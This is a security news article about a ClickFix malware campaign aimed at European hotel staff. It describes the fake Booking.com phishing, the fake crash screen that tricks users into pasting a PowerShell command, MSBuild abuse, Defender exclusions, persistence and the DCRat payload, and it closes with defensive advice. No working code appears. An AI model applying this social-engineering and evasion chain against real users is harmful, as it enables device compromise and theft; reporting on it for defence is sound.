Sophisticated ‘ClickFix’ Malware Campaign Uses Fake Windows Crash Screens To Trick Users Into Running Malicious Code

A sophisticated and highly deceptive cyberattack is currently sweeping through the European hospitality industry, tricking hotel staff into executing malware on their own systems by mimicking familiar system crashes and trusted brands — a blend of psychological manipulation and technical subterfuge that has cybersecurity experts warning of a dangerous new trend in social engineering.

The campaign, tracked by threat researchers at security firm Securonix under the code name PHALT#BLYX, began being observed in December 2025 and has rapidly evolved into a multi-stage infection chain that leverages phishing, brand impersonation, fake system errors, and legitimate Microsoft tooling to bypass traditional defenses and deliver a remote access trojan (RAT) into compromised systems.

The operation’s initial access vector is a classic spear-phishing email that appears to come from Booking.com, one of the world’s largest online travel platforms. These emails notify recipients — typically hotel reservation staff — of a large reservation cancellation or unexpected charge and instruct them to click a link to view details. The lure is carefully crafted to induce urgency, often citing amounts over €1,000 to spur immediate action.

When the recipient follows the embedded link, they’re redirected to a nearly perfect clone of the Booking.com website hosted on a malicious domain such as low-house[.]com. According to Securonix, this imitation is a “high-fidelity clone,” using official logos, fonts, and colours to deceive even cautious users.

Once on the spoofed site, the victim will encounter a staged “Loading is taking too long” error that prompts them to click a refresh button. Instead of simply reloading, the browser switches into full-screen mode and displays a fake Windows Blue Screen of Death (BSOD) animation — a critical element of the so-called ClickFix social engineering tactic.

Unlike legitimate BSOD screens, which only display error codes and instruct users to reboot, the fake BSOD in this attack actively tells users how to “fix” the problem. It guides them to open the Windows Run dialog box (Windows + R), press CTRL+V (pasting a command already copied to the clipboard), and then hit Enter. This action causes the user’s computer to execute a malicious PowerShell command — effectively turning victims into unwitting accomplices in the compromise of their own systems.

The cleverness of the PHALT#BLYX campaign lies not only in its psychological ploys but also in its use of legitimate system tools to evade detection. Once the PowerShell command is executed, it downloads a .NET project file (typically named v.proj) and uses MSBuild.exe, a trusted Microsoft utility, to compile and run it. This “living off the land” (LotL) technique allows the malware to bypass many security products that flag unknown binaries but trust system-signed components.

After compilation, the malware:

• Adds exclusions to Windows Defender to evade detection
• Attempts to elevate privileges by triggering repeated User Account Control (UAC) prompts
• Downloads additional payloads via the Background Intelligent Transfer Service (BITS)
• Establishes persistence by placing shortcut files into the user’s Startup folder
• Executes the final payload, a Remote Access Trojan known as DCRat (Dark Crystal RAT)

Researchers noted that if administrative privileges are not immediately granted, the malware will repeatedly prompt for them — using victim frustration as a secondary social engineering vector to obtain elevated rights.

Once active, the DCRat payload is capable of deep system exploitation. After establishing contact with a command-and-control (C2) server, it sends detailed system fingerprints and lies in wait for further instructions. Its capabilities include:

• Remote desktop control
• Reverse shell command execution
• Silent keylogging
• Memory-only execution of additional payloads

In at least one observed incident, the attackers deployed a cryptocurrency miner as a secondary payload, using the compromised host’s computing resources for financial gain.

Security analysts have signalled potential links between this campaign and Russian-linked threat actors, citing the use of Russian language artifacts within the compiled MSBuild project files and other operational indicators. The focus on room charges in Euros also supports the assessment that Europe’s hospitality sector was specifically targeted during its busiest holiday season.

This isn’t the first time attackers have used Booking.com as a lure in phishing scams. Earlier reports documented similar campaigns abusing Booking.com branding to steal credentials or deliver malware, including credential stealers and other RAT families.

Unlike many automated malware campaigns that rely on unskilled victims opening malicious attachments, the PHALT#BLYX attack manipulates users into executing commands themselves. This human-driven compromise method can easily bypass traditional security controls, such as automated script blockers or sandboxing technologies, because the malicious action originates from user intent — albeit based on deception.

Security experts characterize such campaigns as social engineering on steroids due to their layered psychological manipulation combined with sophisticated technical execution. The use of trusted tools, fake system errors, and branded phishing lures represents an evolution in attacker tactics — shifting away from blunt force exploits to nuanced deception that leverages trust and urgency.

Organisations — especially in the hospitality sector — should to step up both technical and workforce defences:

• Phishing Awareness Training: Staff should be trained to recognize social engineering tactics beyond simple “click this link” scams, including deceptive error prompts and unusual instructions.
• Multi-Factor Verification: Critical actions like handling customer refunds or cancellations should be verified through separate channels before clicking links in emails.
• Endpoint Monitoring: Behavioural detection tools can flag unusual PowerShell command executions or suspicious use of MSBuild.exe.
• Privilege Restrictions: Limiting admin rights and enforcing strict UAC approval policies can help reduce the impact of similar attacks.

The PHALT#BLYX campaign represents a potent combination of psychological trickery and technical sophistication, exploiting both human trust and trusted system components to successfully infect targets in a critical economic sector. As social engineering tactics continue to evolve and blend with advanced “living off the land” techniques, organisations and security teams must similarly adapt their awareness, training, and detection strategies to stay ahead of ever-more convincing threats

Founded in 2008 and headquartered in Addison, TX, Securonix is a cybersecurity platform specializing in identifying, analyzing, and responding to security threats. It uses analytics to provide visibility into network activities, aiming to detect suspicious behavior before it manifests into a breach.